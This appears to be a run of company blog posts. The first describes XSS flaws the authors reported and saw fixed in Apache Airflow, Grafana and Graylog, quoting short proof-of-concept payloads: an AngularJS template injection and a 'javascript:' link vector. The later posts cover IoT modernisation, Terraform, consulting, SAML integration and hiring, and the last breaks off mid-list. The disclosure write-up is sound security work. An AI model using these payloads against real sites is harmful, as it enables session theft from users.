In search of XSS vulnerabilities

This is a blog post introducing our Cloud Security team and a few XSS findings we have found this year in various open source products.

Our team and what we do

Solita has a lot of security minded professionals working in various roles. We have a wide range of security know-how from threat assessment and secure software development to penetration testing. The Cloud Security team is mostly focused on performing security testing on web applications, various APIs, operating systems and infrastructure.

We understand that developing secure software is hard and do not wish to point fingers at the ones who have made mistakes, as it is not an easy task to keep software free of nasty bugs.

You’re welcome to contact us if you feel that you are in need of software security consultation or security testing.

Findings from Open Source products

Many of the targets that we’ve performed security testing for during the year of COVID have relied on a variety of open source products. Open source products are often used by many different companies and people, but very few of them do secure code review or penetration testing on these products. In general, a lot of people use open source products but only a few give feedback or patches, and this can give a false sense of security. However, we do think that open source projects that are used by a lot of companies have a better security posture than most closed source products.

Nonetheless, we’ve managed to find a handful of vulnerabilities from various open source products and as responsible, ethical hackers, we’ve informed the vendors and their software security teams about the issues.

The vulnerabilities found include e.g. Cross-Site Scripting (XSS), information disclosure and a payment bypass in one CMS plugin. But we’ll keep the focus of this blog post in the XSS vulnerabilities since these have been the most common.

What is an XSS vulnerability

Cross-site scripting vulnerability, shortened as XSS, is a client-side vulnerability. XSS vulnerabilities allow attackers to inject client-side JavaScript code that gets executed on the victim’s client, usually a browser. Being able to execute JavaScript on a victim’s browser allows attackers, for example, to use the same functionalities on the web site as the victim by riding on the victims’ session. Requests made with XSS vulnerability also come from the victims IP-address allowing to bypass potential IP-blocks.

All of the following vulnerabilities have been fixed by the vendors and updated software versions are available.

Apache Airflow

Apache Airflow is an open-source workflow management platform, that is being used by hundreds of companies such as Adobe, HBO, Palo Alto Networks, Quora, Reddit, Spotify, Tesla and Tinder. During one of our security testing assignments, we found that it was possible to trigger a stored XSS in the chart pages. 

There are a lot of things you can configure and set in the Apache Airflow, usually, we try to input injections in every place we can test and have some random text to be identified on which part was manipulated with a payload so we can later figure out which is the root cause of the injection.

In the Apache Airflow we found out that one error page did not properly construct the error messages on some misconfiguration cases, this causes the error message to trigger JavaScript. Interestingly in another place, the error message was constructed correctly and the payload did not trigger there, this just shows how hard it is to identify every endpoint where functionalities happen. Changing your name to XSS payload does not usually trigger the most common places where you can see your name such as profile and posts, but you should always look for other uncommon places you can visit. These uncommon places are not usually as well validated for input just due to a simple fact of being less used and not even that well-remembered they exist.


Timeline

15.04.2020 – The vulnerability was found and reported to Apache

20.04.2020 – Apache acknowledged the vulnerability

10.07.2020 – The bug was fixed in the update 1.10.11 and it was assigned the CVE-2020-9485

Grafana

Grafana is an open-source platform for monitoring and observation. It is used by thousands of companies globally, including PayPal, eBay, Solita, and our customers. During one of our security testing assignments, we found that it was possible to trigger a stored XSS via the annotation popup functionality.

The product sports all sorts of dashboards and graphs for visualizing the data. One feature of the graphs is the ability to include annotations for the viewing pleasure of other users.

While playing around with some basic content injection payloads, we noticed that it was possible to inject HTML tags into the annotations. These tags would then render when the annotation was viewed. One such tag was the image tag “<img>”, which can be used for running JavaScript via event handlers such as “onerror”. Unfortunately for us, the system had some kind of filtering in place and our malicious JavaScript payloads did not make it.

While inspecting the page DOM and source of the page, looking for a way to bypass the filtering, I noticed that AngularJS templates were in use as there were references to ‘ng-app’ mentioned. Knowing that naive use of AngularJS could lead to a so-called client-side template injection, I decided to try out a simple payload with a calculus operation in it ‘{{ 7 * 191 }}’. To my surprise, the payload got triggered and the annotation had the value of the calculation present, 1337!

A mere calculator was not sufficient though and I wanted to pop that tasty alert window with this newly found injection. There used to be a protective expression sandbox mechanism in AngularJS, but they probably grew tired of the never-ending cat and mouse play and sandbox escapes that hackers were coming up with, so they removed the sandbox in version 1.6 altogether. And as such providing a payload ‘{{constructor.constructor(‘alert(1)’)()}}’ did just the trick and at this point, I decided to write a report for the Grafana security team.

Timeline

16.04.2020 – The vulnerability was found and reported to the security team at Grafana

17.04.2020 – Grafana security team acknowledged the vulnerability

22.04.2020 – CVE-2020-12052 was assigned to the vulnerability

23.04.2020 – A fix for the vulnerability was released in Grafana version 6.7.3

Graylog

Graylog is an open-source log management platform that is used by hundreds of companies including LinkedIn, Tieto, SAP, Lockheed Martin, and Solita. During one of our security assignments, we were able to find 2 stored XSS vulnerabilities.

During this assessment we had to dig deep in the documentations of Graylog to see what kinds of things were doable in the UI and how to properly make the magic happen. At one point we found out that it’s possible to generate links from the data Graylog receives and this is a classic way to gain XSS by injecting a payload such as ‘javascript:alert(1)’ in the ‘href’ attribute. This, however, requires the user to interact with the generated link by clicking it, but this still executes the JavaScript and does not make the effect of the execution any less dangerous. 

Mika went through Graylog’s documentation and found out about a feature which allowed one to construct links from the data sources, but couldn’t figure out right away how to generate the data to be able to construct this link. He told me about the link construction and told about his gut feeling that there would most likely be an XSS vector in there. After a brief moment of tinkering with the data creation Mika decided to take a small coffee break, mostly because doughnuts were served. During this break I managed to find a way to generate the links correctly and trigger the vulnerability, thus finding a stored XSS in Graylog.



Graylog also supports content packs and the UI provides a convenient way to install third-party content by importing a JSON file. The content pack developer can provide useful information in the JSON such as the name, description, vendor, and URL amongst other things. That last attribute played as a hint of what’s coming, would there be a possibility to generate a link from that URL attribute?

Below you can see a snippet of the JSON that was crafted for testing the attack vector.


Once our malicious content pack was imported in the system we got a beautiful (and not suspicious at all) link in the UI that executed our JavaScript payload once clicked.


As you can also see from both of the screenshots, we were able to capture the user’s session information with our payloads due to it being stored in the browser’s LocalStorage. Storing sensitive information such as the user’s session in the browser’s LocalStorage is not always such a great idea, as LocalStorage is meant to be available for JavaScript to read. Session details in LocalStorage along with a XSS vulnerability can lead to a nasty session hijacking situation.

Timeline

05.05.2020 – The vulnerabilities were found and reported to Graylog security team

07.05.2020 – The vendor confirmed that the vulnerabilities are being investigated

19.05.2020 – A follow-up query was sent to the vendor and they confirmed that fixes are being worked on

20.05.2020 – Fixes were released in Graylog versions 3.2.5 and 3.3.

 

References / Links

Read more about XSS:

https://owasp.org/www-community/attacks/xss/

https://portswigger.net/web-security/cross-site-scripting

 

AngularJS 1.6 sandbox removal:

http://blog.angularjs.org/2016/09/angular-16-expression-sandbox-removal.html

 

Fixes / releases:

https://airflow.apache.org/docs/stable/changelog.html

https://community.grafana.com/t/release-notes-v6-7-x/27119

https://www.graylog.org/post/announcing-graylog-v3-3

 

Ye old timey IoT, what was it anyway and does it have an upgrade path?

What were the internet connected devices of old that collected data? Are they obsolete and need to be replaced completely or is there an upgrade path for integrating them into data warehouses in the cloud?

Previously on the internet

In the beginning the Universe was created.
This has made a lot of people very angry and been widely regarded as a bad move.

— Douglas Adams in his book “The restaurant at the end of the universe”

Then someone had another great idea to create computers, the Internet and the world wide web, and ever since then its been a constant stream of all kinds of multimedia content that one might enjoy as a kind of remittance for the previous blunders by the universe. (As these things, usually, go some people have regarded these as bad moves as well.)

Measuring the world

Some, however, enjoy a completely different type of content. I am talking about data, of course. This need for understanding and measuring the world around us has been with us ever since the dawn of mankind, but interconnected worldwide network combined with cheaper and better automation accelerated our efforts massively.

Previously you had to trek to the ends of the earth, usually accompanied with great financial and bodily risk, to try and set up test equipment or to monitor them with your senses and write down the readings to a piece of paper. But then, suddenly, electronic sensors and other measurement apparatus could be combined with a computer to collect data on-site and warehouse it. (Of course, back then we called warehouse of data a “database” or a “network drive” and had none of this new age poppycock terminology.)

Things were great; No need any longer to put your snowshoes on and risk being eaten by a vicious polar bear when you could just comfortably sit on your chair next to a desk with a brand new IBM PS/2 on it and check the measurements through this latest invention called Mosaic web browser or a VT100 terminal if your department was really old-school. (Oh, those were the days.)

These prototypes of IoT devices were very specialized pieces of hardware for very special use cases for scientists and other rather special types of folk and no Internet-connected washing machines were on sight, yet. (Oh, in hindsight ignorance is bliss. Is it not?)

The rise of the acronym

First, they used Dual-tone Pulse Modulation or DTMF. You put your phone next to the device, pushed a button on it and the thing would scream an ear-shattering series of audible pulses to your phone which then relayed them into a computer somewhere. Later, if you were lucky, a repairman would come over and completely disregard the self-diagnostic report your washing machine had just sent over the telephone lines and usually either fixed the damn thing or made the issue even worse while cursing computers all the way to hell. (Plumbers make bad IT support personnel and vice versa.)

From landlines to wireless

So because of this, and many other reasons, someone had a great idea to network devices like these directly to your Internet connection and cut the middle man, your phone, off the equation altogether. This made things simpler for everyone. (Except for the poor plumber who still continued to disregard the self-diagnostic reports.) And everything was great for a while again until, one day, we woke up and there was a legion of decades-old washing machines, tv’s, temperature sensors, cameras, refrigerators, ice boxes, video recorders, toothbrushes and plethora of other “smart” devices connected to the Internet.

Internet Of Things, or IoT for short, describes these devices as a whole and the phenomenon, the age, that created them.

Suddenly it was no longer just a set of specialized hardware for special people that had connected smart devices collecting data. Now it was for everybody. (This has, yet again, been regarded as a bad move.) We have to look past the obvious security concerns that this heat of connecting every single (useless) thing to the Internet has created, but we can also see the benefit. The data flows, and the data is the new oil as the saying goes.

And there is a lot of data

The volume of data collected with all these IoT devices is staggering and therefore just simple daily old-timey FTP transfers of data to the central server are no longer a viable way of collecting it. We have come up with different new protocols like REST, Websockets, and MQTT to ingest real-time streams of new data points to our databases from all of these data-collecting devices.

Eventually, all backend systems were migrated or converted into data warehouses that were only accepting data with these new protocols and therefore were fundamentally incompatible with the old IoT devices.

What to do? Obsolete and replace them all or is there something that can be done to extend the lifespan of those devices and keep them useful?

The upgrade path, a personal journey

As an example of an upgrade path, I shall share a personal journey on which I embarked in the late 1990s. At this point in time, this is a macabre exercise in fighting against the inevitable obsoletion, but I have devoted tears, sweat, and countless hours over the years to keep these systems alive and today’s example is no different. The service in question runs on a minimal budget and with volunteer effort; So heavy doses of ingenuity are required.

Vaisala weather station at Hämeenlinna observatory.
Vaisala weather station located at Hämeenlinna observatory is now connected with Moxa serial server to remote logger software.

 

Even though Finland is located near or in the arctic circle there are no polar bears around, except in a zoo. Setting up a Vaisala weather station is not something that will cause a furry meat grinder to release your soul from your mortal coil, no, it is actually quite safe. Due to a few circumstances and happy accidents, it is just what I ended up doing two decades ago when setting up a local weather station service in the city of Hämeenlinna. The antiquated 90’s web page design is one of those things I look forward to updating at some point, but today we are talking about what goes on in the background. We talk about data collection.

The old, the garbage and the obsolete

Here, we have the type of equipment that measures and logs data points about the weather conditions at a steady pace. Measurements, which are then read out by specialized software on a computer placed next to it since the communication is just plain old ASCII over a serial connection. The software is old. I mean really old. Actually I am pretty sure that some of you reading this were not even born back in 1998:

Analysis of text strings inside of a binary
Above image shows an analysis of the program called YourVIEW.exe that is used to receive data from this antiquated weather station. It is programmed with Labview version 3.243 that was released back in 1998. This software does not run properly on anything newer than Windows 2000.

This creates a few problematic dependencies; Problems that tend to get bigger with passing time.

The first issue is an obvious one: Old and unsupported version of Windows operating system. No new security patches or software drivers are available which in any IT scenario are a huge problem, but still a common one in any aging IoT solution.

The second problem is: No new hardware is available. No operating system support means no new drivers mean no new hardware if the old one brakes down. After spending a decade to scavenge this and that piece of obsolete computer hardware to pull together a somewhat functioning PC is a quite daunting task that keeps on getting harder every year. People tend to just dispose of their old PCs when buying a new one. The halflife of old PC “obtanium” is really short.

Third challenge: One can’t get rid of the Windows 2000 even if one wanted to since the logging software does not run on anything newer than that; And, yes, I tried even black magic, voodoo sacrifices and Wine under Linux to no avail.

And finally, the data collection itself is a problem: How do you modernize something that uses its own data collection /logging software and integrate it with modern cloud services when said software was conceived before modern cloud computing even existed?

Path step 1, an intermediate solution

As with any problem of technical nature after investigating the problem yields several solutions, but most of them are infeasible for a reason or another. In my example case, I came up with a partial solution that later enables me to continue building on top of it. At its core this is a cloud journey, an cloud migration, not much different from those I daily work with our customers at Solita.

For the first problem, Windows updates, we really can’t do anything about without updating the Windows operating system to more recent and supported release, but unfortunately, the data logging software won’t run anything newer than Windows 2000; Lift and shift it is then. The solution is to virtualize the server and bolster the security around the vulnerable underbelly of the system with firewalls and other security tools. This has the added benefit of improving service SLA due to lack of server/workstation hardware failures, network, and power outages. However, since the weather station communicates over a serial connection (RS232) we need to also somehow virtualize the added physical distance away. There are many solutions, but I chose a Moxa NPort 5110A serial server for this project. Combined with an Internet router capable of creating a secure IPSec tunnel between the cloud & on-site and by using Moxa’s Windows RealCOM drivers one can virtualize the on-site serial port to the remote Windows 2000 virtual server securely.

How about modernizing the data collection then? Luckily YourVIEW writes the received data points into CSV file so it is possible to write secondary logger with Python to collect those data points directly to a remote MySQL server as they become available.

Path step 2, next steps

What was before a vulnerable and obsolete piece of scavenged parts is still a pile of obsolete junk, but now it has a way forward. Many would have discarded it is garbage and thrown this data collection platform away, but with this example, I hope to demonstrate that everything has a migration path and with proper lifecycle management your IoT infrastructure investment does not necessarily need to be only a three-year plan, but one can expect to gain returns for even decades.

An effort on my part is ongoing to replace the MyView software all together with a homebrew logger that runs in a Docker container and published data with MQTT to the Google Cloud Platform IoT Core. IoT Core together with Google Cloud Pub/Sub assembles an unbeatable data ingestion framework. Data can be stored into, but not limited to, Google Cloud SQL and/or exported to BigQuery for additional data warehousing and finally for visualization for example in Google Data Studio.

Even though I use the term “logger” here the term “gateway” would be suitable as well. Old systems require interpretation and translation to be able to talk to modern cloud services. Either commercial solution exists from the vendor of the hardware or in my case I have to write one.

Together we are stronger

I would like to think that my very specific example above is unique, but I am afraid that is not. In principle, all integration and cloud migration journeys have their unique challenges.

Luckily modern partners, like Solita, with extensive expertise in cloud platforms like the Google Cloud Platform, Amazon Web Services or Microsoft Azure and in software development, integration, and data analytics can help a customer to tackle these obstacles. Together we can modernize and integrate existing data collection infrastructures for example in the web, healthcare, banking, at the factory floor, or in logistics. Throwing existing hardware or software into the trash and replacing them with new ones is time-consuming, expensive, and sometimes easier said than done. Therefore carefully planning an upgrade path with a knowledgeable partner might be a better way forward.

Even when considering investing in a completely new solution for data collection a need for integration is usually a requirement at some stage of the implementation and Solita together with our extensive partner network is here to help you.

Share your cloud infra with Terraform modules

Cloud comes with many advantages and one really nice feature is infrastructure as code (IaC). IaC allows one to manage data center trough definition files instead of physically configuring and setting up resources. Very popular tool for the IaC is Terraform.

Terraform is a tool for IaC and it works with multiple clouds. With Terraform configuration files are run from developers machine or part of the CI/CD pipelines. Terraform allows one to create modules, parts of the infrastructure that can be reused. A module is a container for multiple resources that are used together. Even for simple set up, modules are nice, as one does not need to repeat oneself, but they are very handy with some of the more resource-heavy setups. For example, setting up even somewhat simple AWS virtual private cloud (VPC) network can be resource heavy and somewhat complex to do with IaC. As VPC are typically setup in a similar fashion, generic Terraform modules can ease these deployments greatly.

Share your work with your team and the world

Nice feature of these Terraform modules is that you can fairly easily share them. As you are using these modules, you can source them from multiple different locations such as local file system, version control repositories, GitHub, Bitbucket, AWS S3 or HTTP URL. If, and when, you have your configuration files in version control, you can simply point your module’s source to this location. This makes sharing the modules across teams handy.

Terraform also has Terraform Registry, which is an index of modules shared publicly. Here you can share your modules with the rest of the world and really help out fellow developers. Going back to the VPC configuration, you can find really good Terraform modules to help you get started with this. Sharing your own code is really easy and Terraform has very good documentation about it [1]. What you need is GitHub repo named according to Terraform definitions, having description, right module structure and tag. That’s all.

Of course, when sharing you should be careful not to share anything sensitive and specific. Good Terraform Registry modules are typically very generic and self-containing. When sourcing directly from the outside locations, it is good to keep in mind that at times they might not be available and your deployments might fail. To overcome this, taking snapshots of used modules might be a good idea.

Also, I find it a good practice to have a disable variable in the modules. This way user of the module can choose whether to deploy the module by setting a single variable. This kind of variable is good to take into consideration all the way from the beginning because in many cases it affects all the resources in the module. I’ll explain this with the example below.

Send alarms to Teams channel – example

You start to build an application and early on want to have some monitoring in place. You identify the first key metric and start thinking about how to notify yourself on these. I run into this problem all the time. I’m not keen on emails, as those seem to get lost and require you to define who to send them to. On the other hand, I really like chats. Teams and Slack give you channels where you can collaborate on the rising issues and it is easy to add people to the channels.

In AWS, I typically create CloudWatch alarms and route them to one SNS topic. By attaching a simple Lambda function on this SNS one can send the message to the Teams, for example. In Teams, you control the message format with Teams cards. I created a simple card that has some information about the alarm and a link to the metric. I found myself doing this over again, so I decided to build a Terraform module for it.

Here is a simple image of the setup. Terraform module sets up SNS that in turn triggers Lambda function. Lambda function sends all the messages it receives to Teams channel. Set up is really simple, but handy. All I need is to route my CloudWatch alarms to the SNS that is setup by the module and I will get notifications to my Teams channel.

Simple image of the module and how it plugs into CloudWatch events and Teams

Module requires you only to give the Teams channel webhook URL where the messages are sent to. When you create CloudWatch alarm metrics you just need to send them to the SNS topic that the module creates. SNS topic arn is in the module output.

You can now find the Terraform module from the Terraform Registry with a name “alarm-chat-notification” or by following the link in the footer [2]. I hope you find it useful to get you going with alarms.

Disable variable

As I mentioned before, it is a good practice to have disable variable in the module. To do this in Terraform, it is a bit tricky. First, create a variable to control this, in my repo it is called “create” and it is a type of boolean defaulting true. Now all the resource my module has had to have the following line:

count = var.create ? 1 : 0

In Terraform this simply means that if my variable is false, this count is 0 and no resource will be created. Not the most intuitive, but makes sense. This also means that all the resources will be a type of list. Therefore, if you refer to other resources, you have to do it with list operation, even when we know that there is only one. For example, my lambda function refers to the role, it does it by referring to the first element in the list as follows:

aws_iam_role.iam_for_lambda[0].arn

Again this makes sense and it is good to keep in mind.

I hope this blog inspires you to create reusable Terraform modules for the world to use. And please, feel free to source the alarm module.

[1] https://www.terraform.io/docs/registry/modules/publish.html
[2] https://registry.terraform.io/modules/aloukiala/alarm-chat-notification/aws/

Author of this blog post is a data engineer who has built many cloud-based data platforms for some of the largest Nordic companies. 

How to win friends and influence people by consulting?

By definition consulting is easy, just advice people on how to do things in a wiser manner. But how to keep yourself motivated and your skills up-to date in this fast paced world is a totally different matter!

I have done consulting over the years in several different companies and have gathered a routine that helps achieving things described in the starting paragraph. Not everyone is cut for consulting, it requires a special type of person to succeed in it. I am not saying you need to be especially good on particular topics to be able to share your knowledge to your customers.

The first rule of thumb is that you never, never let your skills get old.  It does not matter how busy you are. Always, and i mean always, make some time to study and test new things. If you don’t you are soon obsolete.

Second rule of consulting 101 is that you need to keep yourself motivated, once work becomes a chore you lose your “sparkle” and customers can sense that. If you want to be on top of your game you need to have that thing which keeps customers coming back to you.

Third rule is that you keep you need to keep your customers happy. Always remember who pays your salary. This should be pretty obvious though.

Fourth and the most import rule is “manage yourself”. This is something extremely important in this line of work. It is easy to work too much, sleep too little and eventually have a burnout. This is something that takes practice but is absolutely necessary in the long run. To avoid working too much you need to know yourself and know what symptoms are signs that you are not well. I need to sleep, eat and exercise to avoid this kind of situation. Just saying “work less” is not always possible so good physical and mental health is essential.

Consulting business can be a cutthroat line of work where straight up strongest survive, some describe it as a meritocracy. But in Solita it is not so black and white. We have balanced the game here quite well.
Of course we need to work and do those billable hours. But we have a bit more leg room and we aim ourselves to be the top house in the nordics. Leaving the leftovers for the b-players to collect.

If you still think you might be cut for consulting work, give me call or whatsapp or contact by some other means

Twitter @ToniKuokkanen
IRCnet tuwww
+358 401897586
toni.kuokkanen@solita.fi
https://www.linkedin.com/in/tonikuokkanen/

https://en.wikipedia.org/wiki/How_to_Win_Friends_and_Influence_People 

Integrating AWS Cognito with Suomi.fi and others eIDAS services via SAML interface

AWS Cognito and Azure AD both support SAML SSO integration but neither supports encryption and signing of SAML messages. Here is a solution for a problem that all European public sector organizations are facing.

In the end of 2018, The Ministry of Finance of Finland aligned how Finnish public sector organizations should treat public cloud environments. To summarize, a “cloud first” -strategy. Everybody should use the public cloud, and if they don’t, there must be a clear reason why not. The most typical reason is, of course, classified data. The strategy is an extremely big and clear indication of change regarding how organizations should treat the public cloud nowadays.

To move forward fast, most applications require an authentication solution.  In one of my customer projects I was requested to design the AWS cloud architecture for a new solution with a requirement for strong authentication of citizens and public entities. In Finland, for public sector organizations there exists an authentication service called Suomi.fi (Suomi means Finland) to gain trusted identity. It integrates banks etc. to a common platform.  The service is following strictly the Electronic Identification, Authentication and Trust Services (eIDAS) standard. Currently, and at least in short term future perspective, the Suomi.fi supports only SAML integration.

eIDAS SAML with AWS Cognito – Not a piece of cake

Okay, that’s fine. The plan was to use AWS Cognito for strong security boundary for applications and it supports “the old” SAML integration. But in few hours later, I started to say No, Why and What. The eIDAS standard requires encrypted and signed SAML messaging. Sounds reasonable. However, soon I found out that AWS Cognito (or for example Azure AD) does not support it. My world collapsed for a moment. This was not going to be as easy as I thought.

After I contacted to AWS partner services and Suomi.fi service organization, it was clear that I need to get my hands dirty and build something for this. In Solita we are used to have open discussions and transfer information from mouth to mouth between project. So, I already knew that there are at least a couple of other projects that are facing the problem. They also are using AWS Cognito and they also need to integrate with eIDAS authentication service. This made my journey more fascinating because I could solve a problem for multiple teams.

Solution architecture

Red hat JBoss Keycloak is the star of the day

Again, because open discussion my dear colleague Ari from Solita Health (see how he is doing while these remote work period) pointed out that I should look into the product called Keycloak. After I found out that it is backed by Red Hat JBoss, I knew it has a strong background. The Keycloak is a single sign on solution which supports e.g. SAML integration for eIDAS service and OpenID for AWS Cognito.

Here is simple reference architecture from the solution account setup (click to zoom):

The solution is done with DevOps practices. There is one Git repository for Keycloak Docker image and one for AWS CDK project. The AWS CDK project is provisioning the square area components with dash line to the AWS account (and e.g. CI/CD pipelines not shown in the picture). The rest is done by the actual IaC-repository of each project because it varies too much.

We run Keycloak as a container in AWS Fargate service which has at least two instances always running in two availability zone in the region. The Fargate service integrates nicely with AWS ALB, for example if one container is not able to answer to health check request, it will not receive any traffic and soon it will be replaced by another container automatically.

Multiple keycloak instances forms a cluster. They need to share data between each other via TCP connection. The Keycloak uses jgroups to form the cluster. In the solution, the Fargate service register (and deregister) the new container to AWS Cloud Map service automatically and provides DNS interfaces to find out which instances are up and healthy. Keycloak uses “DNS PING” query method by jgroups to search others via Cloud Map DNS records.

The other thing what Keycloak clusters need is the database. In this solution we used AWS Aurora PostgreSQL PaaS database service.

The login flow

The browser is the key integrator element because it is redirected multiple times with payload from service to another. If you don’t have previous knowledge how  SAML works, check Basics of SAML Auth by Christine Rohacz.

The (simplified) initial login flow is described below. Yep, even it is hugely simplified, it still has so many steps.

  1. User enters access the URL of the application. The application is protected by AWS Application Load Balancer and its listener rule requires user to have valid AWS Cognito session. Because the session it is missing, user is redirected to the AWS Cognito domain.
  2. The AWS Cognito receives request and because no session found and identity provider is defined, it forwards the user again to the Keycloak URL.
  3. The Keycloak receives the request and because no session is found and SAML identity provider is defined, it forwards the user again to the Suomi.fi authentication service with signed and encrypted SAML AuthnRequest.
  4. After user has proven his/her identity at Suomi.fi service, the Suomi.fi service redirects user back to the Keycloak service.
  5. The Keycloak verifies and extracts the SAML message and its attributes, and forwards user back to the AWS Cognito service
  6. The AWS Cognito verifies the OpenID message and asks more user information via secret from Keycloak and finally redirects the user back to the Application ALB.
  7. The application’s ALB receives the identity and finally redirects the user back to the original path of the application’s ALB

Now user have session within the application ALB (not with the Keycloak ALB) for several hours.

The application receives internally few extra headers

The application ALB adds two JWT tokes via x-amzn-oidc-accesstoken and x-amzn-oidc-data headers to each request it sends to the backend. From those headers, the application can easily access to the information who is logged in and other information about the user profile in AWS Cognito. Those headers are only passed between ALB and the application.

Here is example of those headers:

Notice: the data is imaginary and for testing purpose by Suomi.fi

x-amzn-oidc-accesstoken: {
    "sub": "765371aa-a8e8-4405-xxxxx-xxxxxxxx",
    "cognito:groups": [
        "eu-west-1_xxxxxx"
    ],
    "token_use": "access",
    "scope": "openid",
    "auth_time": 1591106167,
    "iss": "https://cognito-idp.eu-west-1.amazonaws.com/eu-west-1_xxxxxx",
    "exp": 1591109767,
    "iat": 1591106167,
    "version": 2,
    "jti": "xxxxx-220c-4a70-85b9-xxxxxx",
    "client_id": "xxxxxxx",
    "username": "xxxxxxxxx"
}

x-amzn-oidc-data: {
    "custom:FI_VKPostitoimip": "TURKU",
    "sub": "765371aa-a8e8-4405-xxxxx-xxxxxxxx",
    "custom:FI_VKLahiosoite": "Mansikkatie 11",
    "custom:FI_firstName": "Nordea",
    "custom:FI_vtjVerified": "true",
    "custom:FI_KotikuntaKuntanro": "853",
    "custom:FI_displayName": "Nordea Demo",
    "identities": "[{\"userId\":\"72dae55e-59d8-41cd-a413-xxxxxx\",\"providerName\":\"Suomi.fi-kirjautuminen\",\"providerType\":\"OIDC\",\"issuer\":null,\"primary\":true,\"dateCreated\":1587460107769}]",
    "custom:FI_lastname": "Demo",
    "custom:FI_KotikuntaKuntaS": "Turku",
    "custom:FI_commonName": "Demo Nordea",
    "custom:FI_VKPostinumero": "20006",
    "custom:FI_nationalIN": "210281-9988",
    "username": "Suomi.fi-kirjautuminen_72dae55e-59d8-41cd-a413-xxxxxx",
    "exp": 1591106287,
    "iss": "https://cognito-idp.eu-west-1.amazonaws.com/eu-west-1_xxxxxx"
}

Security

There are multiple security elements and best practices in use also for this solution. For example, each environment of each system has their own AWS account as the first security boundary. So, there will be separate Keycloak installation for each environment.

There are few secret strings that are generated to the AWS Secret Manager and used by Keycloak service via secret injection in runtime by Fargate task definition. For example, the OpenID secret is generated and shared via AWS Secret Manager and it is newer published to code repository etc.

The Keycloak service is only published by the Suomi.fi realm. Eg. the default admin panel from default realm is not published to the internet. Realm is a Keycloak concept to have multiple solutions inside a single Keycloak system with boundaries.

The Keycloak stores user profiles but it can be automatically cleaned if required by the project.

About me

I’m a cloud architect/consultant for public sector customers in Finland in Solita. I have a long history with AWS. I found a newsletter that in September 2008 EBS service was announced.  Me and my brother were excited and commenting “finally persistent storage for EC2”. The EC2 were extended to Europe a month later. I know for sure that at least from 2008 I have used AWS services. Of course, the years have not been the same, but it is nice to have some memories with you.

What have you always wanted to know about the life of Solita’s Cloud expert?

What’s it like to work at Solita and in the Cloud team? During recruitment meetings and discussions, candidates bring up a range of questions and preconceptions about life at Solita. I asked Helinä Nuutinen from our Cloud Services team in Helsinki to answer some of the most common ones. She might be a familiar face to those who’ve had a technical interview with us.

 

Helinä, could you tell us a little bit about yourself?

I’ve been with Solita for a year as a Cloud Service Specialist in the Cloud Services team. Before that, I worked with more traditional data centre and network services. I was particularly interested in AWS and DevOps, but the emphasis of my previous role was a little different. I participated in Solita’s AWS training, and before I knew it, I started working here.

Currently, I’m part of the operations team of our media-industry customer. Due to coronavirus, we’re working from home, getting used to the new everyday life. I have five smart and friendly team mates, with whom I would normally sit at the customer site from Monday through Thursday. The purpose of our team is to develop and provide tools and operational support services for development teams. We develop and maintain shared operational components such as code-based infrastructure with Terraform and Ansible, manage logs with Elasticsearch Stack as well as DevOps tools and monitoring.

I typically spend my free time outdoors in Western Helsinki, take care of my window sill garden, and work on various crafting and coding projects. Admittedly, lately I haven’t had much energy to sit at the computer after work.

Let’s go through the questions. Are the following statements true or false?

#1 Solita’s Cloud team only works on cloud services, and you won’t succeed if you don’t know AWS, for example.

Practically false. Solita will implement new projects in the public cloud (AWS, Azure, GCP) if there are no regulatory maintenance requirements. We produce regulated environments in the private cloud together with a partner.

To succeed at Solita, you don’t have to be an in-depth expert on AWS environments – interest and background in similar tasks in more traditional IT environments is a great start. If you’re interested in a specific cloud platform, we offer learning paths, smaller projects, or individual tasks.

Many of our co-workers have learned the ins and outs of the public cloud and completed certifications while working at Solita. We are indeed learning at work.

#2 At Solita, you’ll be working at customer sites a lot.

Both true and false. In the Cloud team, it’s rare to sit at the customer site full time. We’re mindful of everyone’s personal preferences. I personally like working on site. Fridays are so-called office days when you have a great reason to visit the Solita office and hang out with colleagues and people you don’t normally meet.

In consulting-focused roles, you’ll naturally spend more at the customer site, supporting sales as well.

(Ed. Note: Our customers’ wishes regarding time spent on site vary. In certain projects, it’s been on the rise lately. However, we will always discuss this during recruitment so that we’re clear on the candidate’s preferences before they join us.)

#3 Solita doesn’t do product development.

Practically false – we do product development, too. Our portfolio includes at least ADE (Agile Data Engine) and WhiteHat. Our Cloud Services team is developing our own monitoring stack, so we also do “internal development”.

(Ed. Note: The majority of Solita’s sales comes from consulting and customer projects, but we also do in-house product development. In addition to WhiteHat and Agile Data Engine, we develop Oravizio, for example. Together, these amount to about 2 MEUR. Solita’s net sales in 2019 was approximately 108 MEUR.)

#4 If you’re in the Cloud team, you need to know how to code.

Sort of. You don’t have to be a super coder. It also depends what kind of projects you have in the pipeline. However, in the Cloud Services team, we build all infrastructure as code, do a lot of development work around our monitoring services, and code useful tools. We’re heavy users of Ansible, Python Terraform and Cloudformation, among others, so scripting or coding skills are definitely an advantage.

#5 The team is scattered in different locations and works remotely a lot.

Sort of true. We have several Cloud team members in Helsinki, Tampere and Turku, and I would argue that you’ll always find a team mate in the office. You can, of course, work remotely as much as your projects allow. Personally, I like to visit the office once a week to meet other Solitans.

To ease separation, we go through team news and discuss common issues in bi-weekly meetings. During informal location-specific discussions, we share and listen to each other’s feedback.

#6 I have a lengthy background in the data centre world, but I’m interested in the public cloud. Solita apparently trains people in this area?

True. We offer in-house learning paths if you’re looking to get a new certfication, for example, or are otherwise interested in studying technology. You’ll get peer support and positive pressure to study at the same pace with others.

As mentioned earlier, public cloud plays a major role in our work, and it will only get stronger in the future. The most important thing is that you’re interested in and motivated to learn new things and work with the public cloud.

(Ed. Note: From time to time, we offer free open-to-all training programmes around various technologies and skills.)

#7 The majority of Solita’s public cloud projects are AWS projects.

True. I don’t have the exact figures, but AWS plays the biggest part in our public cloud projects right now. There’s demand for Azure projects in the market, but we don’t have enough people to take them on.

(Ed. Note: The share of Azure is growing fast in our customer base. We’re currently strengthening our Azure expertise, both by recruiting new talents, and by providing our employees with the opportunity to learn and work on Azure projects.)

#8 Apparently Solita has an office and Cloud experts in Turku?

Yes! In Turku, we have six Cloud team members: four in the Cloud Services team (including subcontractors) plus Antti and Toni who deliver consulting around cloud services. I haven’t been to the office but I hear it’s fun.

(Ed. Note: Solita has five offices in Finland: Tampere, Helsinki, Oulu, Turku and Lahti. At the moment, Cloud is represented in all other cities except Oulu and Lahti.)

#9 Solita sells the expertise of individuals. Does this mean I’d be sitting at the customer site alone?

